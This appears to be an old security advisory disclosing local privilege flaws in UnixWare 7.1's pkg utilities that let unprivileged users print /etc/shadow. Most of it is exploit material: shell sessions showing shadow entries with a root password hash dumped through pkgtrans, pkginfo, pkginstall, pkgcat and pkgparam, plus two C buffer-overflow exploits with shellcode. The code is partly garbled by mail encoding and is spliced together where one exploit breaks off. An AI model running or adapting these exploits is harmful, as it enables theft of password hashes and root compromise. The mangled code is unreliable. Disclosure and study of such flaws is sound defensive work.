Greetings, OVERVIEW Most of UnixWare's pkg commands can be exploited to print /etc/shadow, leading to a probable root compromise. BACKGROUND Only tested on UnixWare 7.1. DETAILS The permissions for the UnixWare pkg commands are as follows: bash-2.02$ ls -la /usr/sbin/pkgchk /usr/bin/pkginfo /usr/bin/pkgparam /usr/bin/pkgtrans /usr/sadm/install/bin/pkgname /usr/sbin/pkgcat /usr/sbin/pkginstall -r-xr-xr-x 1 bin sys 176620 May 21 1999 /usr/bin/pkginfo -r-xr-xr-x 1 root sys 166784 May 21 1999 /usr/bin/pkgparam -r-xr-xr-x 1 bin bin 166216 May 21 1999 /usr/bin/pkgtrans -r-xr-xr-x 1 root sys 3288 May 21 1999 /usr/sadm/install/bin/pkgname -rwxr-xr-x 1 root bin 19436 May 21 1999 /usr/sbin/pkgcat -r-x------ 1 root sys 179440 May 21 1999 /usr/sbin/pkgchk -rwxr-xr-x 1 root bin 19680 May 21 1999 /usr/sbin/pkginstall bash-2.02$ Note that none of these have any elevated modebit-based privileges. Now let's check out /etc/security/tcb/privs: bash-2.02$ cat /etc/security/tcb/privs | grep pkg 179440:2448:939918606:%fixed,dacread:/usr/sbin/pkgchk 176620:53979:939918610:%fixed,dacread:/usr/bin/pkginfo 166784:32218:939918610:%fixed,dacread:/usr/bin/pkgparam 166216:46675:939918610:%fixed,dacread:/usr/bin/pkgtrans 3288:61136:939918611:%fixed,dacread:/usr/sadm/install/bin/pkgname 19436:55289:939918607:%fixed,dacread:/usr/sbin/pkgcat 19680:23331:939918607:%fixed,dacread:/usr/sbin/pkginstall As far as I can tell, the pkgname program doesn't actually do anything and we obviously can't exec pkgchk. The rest of these programs are all vulnerable to /etc/shadow printing exploits. pkg* are able to access /etc/shadow because of the "dacread" permission, which allows the process to override the file permissions and ownership (but only for reading or executing). Two of the exploits below are buffer overflow exploits which execute /tmp /pi. /tmp/pi is a program built by the exploit which simply cats /etc/shadow. Thus any spawned process of a prived program gains the same privileges as that program. EXPLOIT OUTPUT -------------- pkgtrans For this exploit, download the attached "dut.tar" and follow the instructions below. dut.tar simply conforms to the pkgmap/info conventions and allows it to read /etc/shadow. bash-2.02$ cp dut.tar /tmp bash-2.02$ cd /tmp bash-2.02$ tar xvf dut.tar x dut/, 0 bytes, 0 tape blocks x dut/pkginfo, 276 bytes, 1 tape block x dut/pkgmap, 39 bytes, 1 tape block x dut/install/, 0 bytes, 0 tape blocks x dut/install/shadow symbolic link to /etc/shadow bash-2.02$ pkgtrans -s /tmp /tmp/pkgtrans.shadow The following packages are available: 1 dut Brock Tellier's pkgtrans exploit, install and cat /tmp/pkgtrans.shadow for your copy of /etc/shadow (IA32) .01a Select package(s) you wish to process (or 'all' to process all packages). (default: all) [?,??,quit]: 1 Transferring package instance to in datastream format bash-2.02$ cat /tmp/trans.shadow | grep root root:rfAf3OC7XHsj.:10925:::::: bash-2.02$ ------------- pkginfo bash-2.02$ truss -rall -aefo pkginfo.out pkginfo -d /etc/shadow; cat pkginfo.out | grep "r o o t" UX:pkginfo: ERROR: attempt to process package from failed - bad format in datastream table-of-contents truss: cannot control child process, pid# 9188 - KILL TRUSS PROCESS FROM ANOTHER VT - Killed 9187: r o o t : r f A f 3 O C 7 X H s j . : 1 0 9 2 5 : : : : : :\n d bash-2.02$ ------------- pkginstall bash-2.02$ /usr/sbin/pkginstall -s `./uwpkgi 100`: UnixWare 7.1 pkginstall exploit prints/etc/shadow Brock Tellier btellier@usa.net Using addr: 0x8046c3d root:rfAf3OC7XHsj.:10925:::::: daemon:NP:6445:::::: bin:NP:6445:::::: =2E.. -------------- pkgcat bash-2.02$ /usr/sbin/pkgcat -s `./uwpkgcat 100`: UnixWare 7.1 pkgcat exploit prints/etc/shadow Brock Tellier btellier@usa.net Using addr: 0x8046c3d root:rfAf3OC7XHsj.:10925:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: =2E.. ------------ pkgparam bash-2.02$ pkgparam -f /etc/shadow rfAf3OC7XHsj.:10925:::::: NP:6445:::::: NP:6445:::::: =2E.. EXPLOITS --- uwpkgcat.c --- /** ** UnixWare 7.1 /usr/sbin/pkgcat exploit ** Prints contents of /etc/shadow (execing shell won't be enough here) ** Demonstrates overflow in uw71's gethostbyname() and dacread permissio n ** problems. Use offsets of +-100. ** ** Compile cc -o uwpkgcat uwpkgcat.c ** run /usr/sbin/pkgcat -s `./uwpkgcat 100`: ** ** Brock Tellier btellier@usa.net **/ #include #include char scoshell[]=3D "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define LEN 3500 #define NOP 0x90 #define CODE "void main() { system(\"cat /etc/shadow\"); }\n" void buildpi() { FILE *fp; char cc[100]; fp =3D fopen("/tmp/pi.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c"); system(cc); } int main(int argc, char *argv[]) { long int offset=3D0; int i; int buflen =3D LEN; long int addr; char buf[LEN]; buildpi(); if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc =3D=3D 2){ offset=3Datoi(argv[1]); = } else if (argc =3D=3D 3) { offset=3Datoi(argv[1]); buflen=3Datoi(argv[2]); } else { offset=3D100; buflen=3D3000; } addr=3D0x8046b75 + offset; fprintf(stderr, "\nUnixWare 7.1 pkgcat exploit prints"); fprintf(stderr, "/etc/shadow\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=3D((buflen/2) + strlen(scoshell))+2;i #include char scoshell[]=3D "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define LEN 3500 #define NOP 0x90 #define CODE "void main() { system(\"cat /etc/shadow\"); }\n" void buildpi() { FILE *fp; char cc[100]; fp =3D fopen("/tmp/pi.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c"); system(cc); } int main(int argc, char *argv[]) { long int offset=3D0; int i; int buflen =3D LEN; long int addr; char buf[LEN]; buildpi(); if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc =3D=3D 2){ offset=3Datoi(argv[1]); } else if (argc =3D=3D 3) { offset=3Datoi(argv[1]); buflen=3Datoi(argv[2]); } else { offset=3D100; buflen=3D3000; } addr=3D0x8046b75 + offset; fprintf(stderr, "\nUnixWare 7.1 pkginstall exploit prints"); fprintf(stderr, "/etc/shadow\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=3D((buflen/2) + strlen(scoshell))+2;i